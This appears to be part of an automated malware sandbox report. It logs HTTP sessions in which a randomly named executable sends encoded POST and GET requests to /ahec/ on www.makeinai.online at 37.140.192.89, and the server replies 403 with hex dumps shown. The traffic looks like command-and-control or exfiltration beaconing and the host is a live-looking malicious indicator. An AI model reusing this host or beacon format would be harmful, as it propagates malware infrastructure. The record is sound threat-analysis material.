                                                                        Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                        Dec 2, 2023 18:49:56.537066936 CET1340INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
                                                                        Data Ascii: Sg+=a\2R%7Y'pA\RyeeN{ckPc]m#sc1?g\I6KzQqCua'c'{23^bx%)orLBPIzIDVdB(^ -.,#4~>#FU!e%_RM@&D=~^5tW^b{%QV68o}
                                                                        Dec 2, 2023 18:49:56.537086010 CET1340INData Raw: ad 53 c1 60 6e 1e 8f 19 da 7d 2c 49 f1 02 dd 83 d5 0f c0 db 83 f5 0f 80 da cc 0d 3c ec 19 33 9b c0 5d d9 c1 dd 7d f9 bd 09 a2 38 13 4d b5 ae 42 56 82 f8 28 04 7a 5a 80 50 53 38 7e 96 40 15 8f b9 3d d2 eb 78 c4 8f 28 a8 ac 67 1b 86 5c 57 6f b0 76
                                                                        Data Ascii: S`n},I<3]}8MBV(zZPS8~@=x(g\WovnRlw?46-T,XhlDUvU}OdVxoMm-?(^]#3,5UJ1EY!9$cE->i*MoUWeA!
                                                                        Dec 2, 2023 18:49:56.537602901 CET1340INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                        Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                        Dec 2, 2023 18:49:56.537653923 CET1340INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                        Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                        Dec 2, 2023 18:49:56.538223982 CET1340INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                        Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                        Dec 2, 2023 18:49:56.538244009 CET1340INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                        Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                        Dec 2, 2023 18:49:56.538733006 CET1340INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                        Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                        Dec 2, 2023 18:49:56.538777113 CET1340INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                        Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                        Dec 2, 2023 18:49:56.757477045 CET1340INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                        Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.104972337.140.192.89805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:59.288974047 CET1828OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.makeinai.online
                                                                        Origin: http://www.makeinai.online
                                                                        Referer: http://www.makeinai.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 50 33 53 2b 4e 5a 6d 4a 30 33 4f 57 44 53 43 65 7a 49 6f 6c 56 4d 45 73 77 31 59 48 32 41 37 69 2f 58 56 36 76 79 4a 72 6e 50 55 2f 64 46 77 56 46 45 68 6b 58 73 36 6d 38 37 63 63 2b 53 49 4e 59 68 4f 36 59 31 47 69 71 33 4f 56 63 65 43 50 41 65 56 75 75 68 30 47 5a 2f 6e 79 55 64 78 4c 63 4d 37 6f 31 6c 37 45 66 70 55 77 6d 6b 74 2b 66 50 53 52 6c 54 47 57 4c 70 65 76 71 63 6a 31 39 42 57 6d 39 46 45 4a 6e 71 38 4e 74 59 46 71 46 6a 33 54 61 76 30 74 76 37 61 30 62 62 76 5a 44 44 49 43 34 7a 52 58 72 6d 36 61 51 41 54 34 42 4c 39 72 53 44 38 35 46 55 66 5a 67 4d 6d 5a 55 74 77 36 6b 79 36 74 31 77 66 4b 54 74 63 2f 34 69 50 6c 4e 46 75 49 4e 38 64 4f 57 35 70 74 4f 42 68 41 66 33 42 77 73 77 39 53 36 4d 51 68 6b 52 38 76 38 57 33 70 62 48 5a 4b 56 49 7a 45 69 51 4e 49 4b 59 43 38 38 6c 2b 54 4b 68 65 79 51 79 36 43 65 6a 67 6b 4f 49 35 4f 74 56 63 41 67 71 4c 67 4b 69 42 44 44 4d 72 6d 77 6a 39 48 43 49 50 49 33 6d 4c 51 43 6d 4a 4a 45 58 42 36 33 34 46 75 78 59 4b 4f 65 71 44 76 38 55 69 45 57 2f 73 51 58 46 34 48 34 73 48 75 69 49 30 48 6c 6a 51 4c 6e 68 33 42 78 71 56 67 46 45 4d 55 4c 38 2b 44 65 4a 4a 45 58 49 36 4d 62 5a 34 36 67 77 6d 51 48 5a 77 75 6d 59 68 33 6a 33 62 47 2b 66 42 50 73 67 2b 31 74 54 54 6b 4d 55 70 4b 73 47 34 4f 74 4b 4f 62 62 76 75 39 77 6c 39 66 44 58 73 4a 37 2f 47 42 46 41 4c 78 35 52 38 30 77 64 54 64 36 4b 36 56 37 70 4a 34 32 50 71 36 65 5a 45 76 78 38 5a 37 59 70 79 65 6c 32 52 73 65 4e 6b 75 72 30 32 47 7a 59 34 44 7a 65 6a 5a 59 36 4a 77 54 42 53 61 49 62 57 59 59 6d 42 76 51 4a 63 32 42 42 6f 6d 71 65 59 64 69 55 78 44 6b 43 43 66 45 70 48 70 45 70 54 59 34 73 53 6c 31 6f 35 72 67 73 4c 42 4a 61 46 63 35 64 41 49 54 57 6e 59 6a 47 55 4e 38 37 74 61 42 33 4f 75 2f 55 52 62 37 53 55 43 6a 4a 66 68 45 59 6f 79 50 36 74 2f 48 54 4e 71 48 58 33 67 53 45 4c 6a 58 42 35 68 72 49 7a 49 62 75 70 5a 6c 39 78 46 6d 2b 4d 41 36 31 68 48 4a 53 56 67 4d 2f 42 6a 5a 4a 4e 47 59 6b 5a 66 43 67 6d 51 58 45 72 70 4f 2f 76 69 56 58 67 4a 37 4b 52 74 70 33 43 4b 66 61 4e 4c 43 50 48 4e 36 63 54 78 76 4b 79 43 73 57 2b 68 51 4f 51 4b 54 53 76 4d 58 6b 62 7a 6c 52 41 70 45 73 77 2b 30 62 37 59 35 43 71 76 53 58 52 64 38 70 76 55 50 47 6e 34 67 45 55 6e 4a 52 63 6e 52 78 50 6b 54 6b 41 63 54 4d 4d 4b 53 52 54 5a 53 5a 6e 74 70 56 7a 64 30 51 4c 68 30 33 69 62 2f 6e 6b 4f 74 6c 48 79 67 49 48 6e 31 30 73 69 54 36 42 6a 50 31 6a 37 38 44 32 70 48 76 6e 77 44 37 39 6a 67 36 65 4e 76 73 7a 66 43 70 75 4f 4d 50 6f 6c 52 37 6f 71 39 38 55 65 38 62 62 62 56 75 43 65 70 68 75 4d 52 51 2f 64 2f 4e 59 77 2b 6c 7a 56 64 50 46 75 41 48 57 5a 34 59 70 78 45 52 41 37 2b 6e 52 36 37 47 77 70 43 33 4f 51 77 62 39 66 57 71 62 49 37 46 6b 32 78 37 35 65 67 6d 59 56 39 41 54 47 54 57 2f 6f 44 67 59 56 73 4c 56 47 38 2f 59 47 76 77 77 5a 66 47 6e 59 32 6a 6f 76 4d 68 71 36 75 55 32 65 61 2f 52 43 6c 6e 4e 36 37 30 4f 6a 42 70 69 46 46 56 2f 77 5a 53 63 79 78 2b 57 38 6e 4b 4c 52 4a 77 58 47 46 78 6b 76 6b 67 63 38 6c 6e 56 76 75 69 61 58 6c 54 67 6a 66 72 52 6b 75 66 53 6a 4d 38 4d 53 58 57 4f 54 41 36 56 68 39 75 71 46 77 37 54 6a 51 44 59 65 78 70 6e 68 4e 2b 5a 30 5a 43 6f 50 2f 34 75 52 47 44 2b 59 71 52 79 6e 59 47 30 78 37 47 61 74 4d 34 4f 39 75 76 70 36 41 6c 6b 71 64 70 72 37 6e 51 30 71 35 69 76 4e 69 79 54 2b 45 39 7a 72 56 49 50 68 45 36 78 32 65 71 4f 75 41 4a 33 57 4c 62 30 33 6a 67 47 36 68 65 4a 62 72 58 71 4f 58 74 78 4c 2b 56 37 6d 48 72 39 63 66 75 75 38 58 37 78 61 53 48 34 6e 79 6f 45 4e 52 6e 46 57 43 67 64 4c 34 71 34 38 73 75 32 37 4b 53 32 53 56 2f 51 79 75 75 58 49 30 36 43 6d 58 34 2f 39 68 53 75 4c 4e 30 30 70
                                                                        Data Ascii: Ot=Bw1JIdbMW2KoP3S+NZmJ03OWDSCezIolVMEsw1YH2A7i/XV6vyJrnPU/dFwVFEhkXs6m87cc+SINYhO6Y1Giq3OVceCPAeVuuh0GZ/nyUdxLcM7o1l7EfpUwmkt+fPSRlTGWLpevqcj19BWm9FEJnq8NtYFqFj3Tav0tv7a0bbvZDDIC4zRXrm6aQAT4BL9rSD85FUfZgMmZUtw6ky6t1wfKTtc/4iPlNFuIN8dOW5ptOBhAf3Bwsw9S6MQhkR8v8W3pbHZKVIzEiQNIKYC88l+TKheyQy6CejgkOI5OtVcAgqLgKiBDDMrmwj9HCIPI3mLQCmJJEXB634FuxYKOeqDv8UiEW/sQXF4H4sHuiI0HljQLnh3BxqVgFEMUL8+DeJJEXI6MbZ46gwmQHZwumYh3j3bG+fBPsg+1tTTkMUpKsG4OtKObbvu9wl9fDXsJ7/GBFALx5R80wdTd6K6V7pJ42Pq6eZEvx8Z7Ypyel2RseNkur02GzY4DzejZY6JwTBSaIbWYYmBvQJc2BBomqeYdiUxDkCCfEpHpEpTY4sSl1o5rgsLBJaFc5dAITWnYjGUN87taB3Ou/URb7SUCjJfhEYoyP6t/HTNqHX3gSELjXB5hrIzIbupZl9xFm+MA61hHJSVgM/BjZJNGYkZfCgmQXErpO/viVXgJ7KRtp3CKfaNLCPHN6cTxvKyCsW+hQOQKTSvMXkbzlRApEsw+0b7Y5CqvSXRd8pvUPGn4gEUnJRcnRxPkTkAcTMMKSRTZSZntpVzd0QLh03ib/nkOtlHygIHn10siT6BjP1j78D2pHvnwD79jg6eNvszfCpuOMPolR7oq98Ue8bbbVuCephuMRQ/d/NYw+lzVdPFuAHWZ4YpxERA7+nR67GwpC3OQwb9fWqbI7Fk2x75egmYV9ATGTW/oDgYVsLVG8/YGvwwZfGnY2jovMhq6uU2ea/RClnN670OjBpiFFV/wZScyx+W8nKLRJwXGFxkvkgc8lnVvuiaXlTgjfrRkufSjM8MSXWOTA6Vh9uqFw7TjQDYexpnhN+Z0ZCoP/4uRGD+YqRynYG0x7GatM4O9uvp6Alkqdpr7nQ0q5ivNiyT+E9zrVIPhE6x2eqOuAJ3WLb03jgG6heJbrXqOXtxL+V7mHr9cfuu8X7xaSH4nyoENRnFWCgdL4q48su27KS2SV/QyuuXI06CmX4/9hSuLN00p
                                                                        Dec 2, 2023 18:49:59.515948057 CET1340INHTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:49:59 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"64f9f107-377d8"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8 48 4d d7 ce 6d 81 9c 6a 16 c9 e1 99 83 73 ae d8 af 06 76 ac 49 67 c5 7c d3 1a 2f 20 7b db c9 55 a3 51 eb 1a 77 9d 16 e9 25 c0 4e 24 12 46 36 c0 94 b8 89 a6 78 c4 42 d5 98 fe 4e 6d 92 e5 2d 3b 7d 75 71 a7 1b f4 83 b0 98 07 70 77 40 52 19 20 79 a6 f0 87 3a 9e 92 4f 61 48 8a e9 3a 03 49 63 a4 1b 77 97 8f 6a b9 93 bb e9 58 00 a1 3b 3a 3b 5c 18 83 bf 7f 5a c8 0b 75 31 e2 ee 69 05 0f a6 76 c7 76 b2 96 60 45 ff c8 ff 03 03
                                                                        Data Ascii: 6000H/}B1Rn`Qc,*M$Ur'FDJIQjLu[_Dgsm2Zy^gVYwc_\9- t"?};0ZF7_8@//at93wmk{^o~otYvkLW|99x=wsw=w/.fvohs)=+TaD(K0:bWg=7{_6u5oO-~6}7^x~n"_g]'<Z%QjrSqsw}='+;vcqt`O2n9uGq"wfwlOqPc:\w]X,&["{3XB<lg=7ti2N";x?^~MNooI}))4DwrDOWz;8pp}U$lPE@a$4{"W:3F#Zu@p]Twz;wMmnp+sNOFp{"tt0sv}PQrV]7UCge*'*YK`mO!H_5MVE*M'XWfujE&w3lLmpJ2im))LK).Y `gHMmjsvIg|/ {UQw%N$F6xBNm-;}uqpw@R y:OaH:IcwjX;:;\Zu1ivv`E
                                                                        Dec 2, 2023 18:49:59.515973091 CET1340INData Raw: ee db d1 18 75 93 21 65 43 14 3b d8 cd 73 45 6c 03 99 3d 77 ed 24 2a a2 99 59 db 93 e7 3f 80 82 ef ee 23 e7 7d 34 98 3b 33 3f b0 c9 13 c8 db c7 8a 1a e3 25 5a ef 52 3d 18 09 27 40 d6 75 95 51 62 ac df 89 29 76 d7 35 e5 dd c8 59 dd 83 b7 47 bf c6
                                                                        Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                        Dec 2, 2023 18:49:59.516318083 CET1340INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
                                                                        Data Ascii: Sg+=a\2R%7Y'pA\RyeeN{ckPc]m#sc1?g\I6KzQqCua'c'{23^bx%)orLBPIzIDVdB(^ -.,#4~>#FU!e%_RM@&D=~^5tW^b{%QV68o}
                                                                        Dec 2, 2023 18:49:59.516483068 CET1340INData Raw: ad 53 c1 60 6e 1e 8f 19 da 7d 2c 49 f1 02 dd 83 d5 0f c0 db 83 f5 0f 80 da cc 0d 3c ec 19 33 9b c0 5d d9 c1 dd 7d f9 bd 09 a2 38 13 4d b5 ae 42 56 82 f8 28 04 7a 5a 80 50 53 38 7e 96 40 15 8f b9 3d d2 eb 78 c4 8f 28 a8 ac 67 1b 86 5c 57 6f b0 76
                                                                        Data Ascii: S`n},I<3]}8MBV(zZPS8~@=x(g\WovnRlw?46-T,XhlDUvU}OdVxoMm-?(^]#3,5UJ1EY!9$cE->i*MoUWeA!
                                                                        Dec 2, 2023 18:49:59.516968012 CET1340INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                        Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                        Dec 2, 2023 18:49:59.517009974 CET1340INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                        Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                        Dec 2, 2023 18:49:59.517668962 CET1340INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                        Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                        Dec 2, 2023 18:49:59.517688990 CET1340INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                        Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                        Dec 2, 2023 18:49:59.518271923 CET1340INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                        Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                        Dec 2, 2023 18:49:59.518295050 CET1340INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                        Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                        Dec 2, 2023 18:49:59.734391928 CET1340INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                        Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.104972437.140.192.89805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:02.074521065 CET513OUTGET /ahec/?Ot=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0CLYcLsXbR3hQ==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.makeinai.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:02.294822931 CET1340INHTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:50:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 227288
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "64f9f107-377d8"
